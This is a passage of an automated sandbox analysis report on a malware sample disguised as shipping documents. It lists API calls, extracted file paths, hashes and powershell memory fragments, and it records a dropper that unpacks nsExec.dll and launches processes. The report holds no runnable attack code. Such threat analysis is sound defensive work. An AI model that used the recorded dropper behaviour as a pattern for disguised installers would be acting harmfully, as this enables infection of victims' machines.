                                      • CreateFontIndirectW.GDI32(0040D908), ref: 00402037
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                      • String ID:
                                      • API String ID: 4253744674-0
                                      • Opcode ID: 68512fbf4ac7801365b5f78afe65c0e513a631e9eafc47c317fc045465379f25
                                      • Instruction ID: 19ee21ee25b481e0e115610c7b0d21c914cbbc44bdafb393b7f83238122b1e8a
                                      • Opcode Fuzzy Hash: 68512fbf4ac7801365b5f78afe65c0e513a631e9eafc47c317fc045465379f25
                                      • Instruction Fuzzy Hash: 4B01D4B6905340AFD300AFB4AD0AB563FA8ABA9705F10483DF641B71E2C6784709CB2D
                                      APIs
                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CC3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 0040655C
                                      • CharPrevW.USER32(?,00000000), ref: 00406567
                                      • lstrcatW.KERNEL32(?,004092B0), ref: 00406579
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406556
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 2659869361-823278215
                                      • Opcode ID: fdfa961eb15b44997f3f2a02f7ac6fdf64fbe3aae0b57c1f36678e5d22b7198e
                                      • Instruction ID: 519304617d09d62b109db9489078dc762d93bb7b848864bf6502fc90c90d6087
                                      • Opcode Fuzzy Hash: fdfa961eb15b44997f3f2a02f7ac6fdf64fbe3aae0b57c1f36678e5d22b7198e
                                      • Instruction Fuzzy Hash: 3BD05E31502521BBC7029B64AD08D9B7BBCEF46301301446AFA41B3165C7745D41C7ED
                                      APIs
                                        • Part of subcall function 00405D3A: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D6C
                                        • Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D7E
                                        • Part of subcall function 00405D3A: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D99
                                        • Part of subcall function 00405D3A: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll), ref: 00405DB1
                                        • Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
                                        • Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
                                        • Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00
                                        • Part of subcall function 004069F3: ShellExecuteExW.SHELL32(?), ref: 00406A02
                                        • Part of subcall function 00406514: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040651E
                                        • Part of subcall function 00406514: GetExitCodeProcess.KERNEL32(?,?), ref: 00406548
                                      • CloseHandle.KERNEL32(?,?), ref: 00402110
                                      Strings
                                      • C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer, xrefs: 004020D1
                                      • @, xrefs: 004020F2
                                      • C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll, xrefs: 00402098
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
                                      • String ID: @$C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer
                                      • API String ID: 4079680657-4292468661
                                      • Opcode ID: 695c155ae2aa0d65a87f0415198d5af33f758c25e38eb3c1e900b1cee02d820b
                                      • Instruction ID: 7c7d4bc9f8110f395c3ef373be7a4f0c936d35dff6000358c7303bcbf620d08d
                                      • Opcode Fuzzy Hash: 695c155ae2aa0d65a87f0415198d5af33f758c25e38eb3c1e900b1cee02d820b
                                      • Instruction Fuzzy Hash: 47118F716083809BC310AF61C98561BBBE5BF84349F00493EF595E72D1DBBC8845CB4A
                                      APIs
                                      • DestroyWindow.USER32(00000000,00403579), ref: 0040339A
                                      • GetTickCount.KERNEL32 ref: 004033B9
                                      • CreateDialogParamW.USER32(0000006F,00000000,0040364F,00000000), ref: 004033D8
                                      • ShowWindow.USER32(00000000,00000005), ref: 004033E6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: 7ff58af3a69088ba52de52b21ac6e50ccae1de6d9f2c722b533f380b119e7b3d
                                      • Instruction ID: 0c7035cfe5d59141003efccf1163e7ed1ec08c4572f7111a89f6d0b07e944292
                                      • Opcode Fuzzy Hash: 7ff58af3a69088ba52de52b21ac6e50ccae1de6d9f2c722b533f380b119e7b3d
                                      • Instruction Fuzzy Hash: 87F098B0981300BBEB24AF60EE4DB5A3AB8B744B03F800979F505B51E1DB795955DA1C
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00405904
                                      • CallWindowProcW.USER32(?,?,?,?), ref: 0040594C
                                        • Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: ce6b446289bf2d1d80a1f39e5d6dd25478004387473800b399ee72f8fd73986e
                                      • Instruction ID: 06e031647f3a40a893da8a12316d751141f27423df1ca697d7c88d312f012a23
                                      • Opcode Fuzzy Hash: ce6b446289bf2d1d80a1f39e5d6dd25478004387473800b399ee72f8fd73986e
                                      • Instruction Fuzzy Hash: 64018F72A00609FBEF305F51ED44A9B3A2AEB54760F104437F904B61E1C2798892DFA9
                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 00405874
                                        • Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA
                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004058C0
                                        • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                        • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                      Strings
                                      • perchlorination: Installing, xrefs: 00405864
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: MessageSend$InitializeUninitialize
                                      • String ID: perchlorination: Installing
                                      • API String ID: 1011633862-2388396748
                                      • Opcode ID: d3b477feca803d38b0fa0a9443a8adab0e946c85309316e9af7505676d23e992
                                      • Instruction ID: 6162ea9da32c9538b6d8593dc8e66a114e5892011aec6599076d88f80df4c0eb
                                      • Opcode Fuzzy Hash: d3b477feca803d38b0fa0a9443a8adab0e946c85309316e9af7505676d23e992
                                      • Instruction Fuzzy Hash: C5F0FA33500A009AF711B715AC02B6B73A8EB84705F08813EEE48A22A2E77948409B69
                                      APIs
                                      • DispatchMessageW.USER32(?), ref: 0040621B
                                      • PeekMessageW.USER32(?,00000000,?,y5@,00000001), ref: 0040622F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeek
                                      • String ID: y5@
                                      • API String ID: 1770753511-1888225771
                                      • Opcode ID: 64ff892afa75a6f008d7101155dee183943c3d1907309ee94509adaab9142ef1
                                      • Instruction ID: a24ec92ef1b44bd1206bcd030c3399a913cbf723d0e0f52077422d22942c0190
                                      • Opcode Fuzzy Hash: 64ff892afa75a6f008d7101155dee183943c3d1907309ee94509adaab9142ef1
                                      • Instruction Fuzzy Hash: 41D0127194020ABBEF10AFE0DD09F9A7B6CAB54744F008475B701B5091D678D5258B59
                                      APIs
                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403458,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,80000000,00000003,?,?,?,?,?), ref: 00406D16
                                      • CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D27
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrlen
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 2709904686-1246513382
                                      • Opcode ID: ad5ea2724f566449118616985c1ca7d7286fc26986b3b6df7891a374239d9a00
                                      • Instruction ID: 44824fea6f3b9252f25675ab164e3effdf97f7511deaacd8752cc1a9fc297a0b
                                      • Opcode Fuzzy Hash: ad5ea2724f566449118616985c1ca7d7286fc26986b3b6df7891a374239d9a00
                                      • Instruction Fuzzy Hash: CBD05E31102531ABCB126B18DC059AF77B8EF41300306886AE542E7164C7785D92CBAD
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a993467367df8efc973d4b3f53f8abcb43d326c52bf5ab646ca51ecb3ac7a87
                                      • Instruction ID: 9b00f834a18dc88a065cb5770f5800edc0318fea18627f473e33cc0bd4e53917
                                      • Opcode Fuzzy Hash: 2a993467367df8efc973d4b3f53f8abcb43d326c52bf5ab646ca51ecb3ac7a87
                                      • Instruction Fuzzy Hash: 36B17F71E00219DFDF94CFA8C9857ADBBF2AF88304F158169D815E7294EBB49942CF81
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2911732406.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b67bae8ecfd03c6f26b89739826418c63b2f8569cbb457391d68cdab7b4ecd9
                                      • Instruction ID: 264be56b635df54ac485fcf98eb220aa067177323248d489a57baa259512b330
                                      • Opcode Fuzzy Hash: 3b67bae8ecfd03c6f26b89739826418c63b2f8569cbb457391d68cdab7b4ecd9
                                      • Instruction Fuzzy Hash: 97B16E70E00209CFDF50CFA8C9857ADBBF2EF88314F158569D815A7254EBB89885CF81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$x.{k$-{k
                                      • API String ID: 0-1827549809
                                      • Opcode ID: 039d899ee58c3ee7d5e07f9db4d87c2354b36b2bf5e8f2b0e794dbb75bbfaf26
                                      • Instruction ID: 22b40d205869ee66e4bebc2c320bbb053533a6bbbeddc4147e45c702dd4a144f
                                      • Opcode Fuzzy Hash: 039d899ee58c3ee7d5e07f9db4d87c2354b36b2bf5e8f2b0e794dbb75bbfaf26
                                      • Instruction Fuzzy Hash: 6382C270B102058FDB24DB58C950BAABBB2EF85314F54C4A9D9099F352CB72DD46CFA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q$x.{k$x.{k$-{k
                                      • API String ID: 0-774738033
                                      • Opcode ID: 9ad3a78dffb27d4904751e80f60f8505f128db15662d68c1449cfb604a975cd1
                                      • Instruction ID: fe54a5e7c4126c7335d54ef095654d5d9998a37dd68cc334fcdc923e08a9fc75
                                      • Opcode Fuzzy Hash: 9ad3a78dffb27d4904751e80f60f8505f128db15662d68c1449cfb604a975cd1
                                      • Instruction Fuzzy Hash: 3E927170B102158FDB64DB58CA50BAABBB2FF85304F5484E8D9096B351CB72ED86CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q
                                      • API String ID: 0-2931719552
                                      • Opcode ID: f161e557791d77aeb9e7ec31e890e2b6934267c0f02e41eb9bdd88ebb0358f18
                                      • Instruction ID: 02ce8f8d469ce7881556cd0b9cb1d4272f1e6e3a681a632fda704907547232bf
                                      • Opcode Fuzzy Hash: f161e557791d77aeb9e7ec31e890e2b6934267c0f02e41eb9bdd88ebb0358f18
                                      • Instruction Fuzzy Hash: A832E070B1124A9FDB24CB99C641BAABBF2EF85310F188479E9059F351CB72ED41CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q$x.{k$-{k
                                      • API String ID: 0-3535003682
                                      • Opcode ID: 31c7197b8b6e131a99282c801d7858d5f568702457f8a47d8518bdf2a395acbf
                                      • Instruction ID: 6bb3693d85c3153dd140ba6198807081b275fb2748d27b89721768bd46accdd2
                                      • Opcode Fuzzy Hash: 31c7197b8b6e131a99282c801d7858d5f568702457f8a47d8518bdf2a395acbf
                                      • Instruction Fuzzy Hash: 3AE1C370B102059FCB15DBA9C650BAEBBA2EFC4314F15C828E8016F395CB72EC46CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$4']q$4']q
                                      • API String ID: 0-1785108022
                                      • Opcode ID: 659ae33cd965c86002aa74b36aac706d4c53368c71dd74a0da2d65fcec9c9407
                                      • Instruction ID: 25370d4c44118529ec118763f1b2afd64d2ee9adff1f2def53e0071f744488ac
                                      • Opcode Fuzzy Hash: 659ae33cd965c86002aa74b36aac706d4c53368c71dd74a0da2d65fcec9c9407
                                      • Instruction Fuzzy Hash: E8123CB1B24246DFCF255B7895107AABBA2AFC7310F1C887AD905CF251DB32D846C7A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$4']q$x.{k$-{k
                                      • API String ID: 0-3515066249
                                      • Opcode ID: 783588c43e7bc2bc6ac26ea71f32ebb10dbd55b223d4b58d928f5d671081889f
                                      • Instruction ID: 9745c6a11e9b3496a27254df996480281d3dff013e03a9d599215a74539abfcc
                                      • Opcode Fuzzy Hash: 783588c43e7bc2bc6ac26ea71f32ebb10dbd55b223d4b58d928f5d671081889f
                                      • Instruction Fuzzy Hash: 3EC1A170B102069FDB15DF95C640B9EBBB2AF84314F19C469E8016F395CB75E886CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.2913579582.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7290000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4']q$x.{k$-{k
